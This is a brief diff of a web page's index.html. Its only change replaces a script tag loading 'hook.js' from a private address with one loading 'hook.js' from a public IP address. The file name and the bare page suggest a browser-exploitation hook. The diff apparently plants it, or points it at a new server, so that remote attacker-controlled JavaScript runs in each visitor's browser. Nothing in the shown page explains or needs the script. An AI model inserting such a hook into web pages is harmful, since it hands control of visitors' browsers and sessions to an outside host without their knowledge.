--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title></title>
-    <script src="http://172.22.48.1/hook.js"></script>
+    <script src="https://102.88.52.251/hook.js"></script>
 </head>
 <body>
     <style>
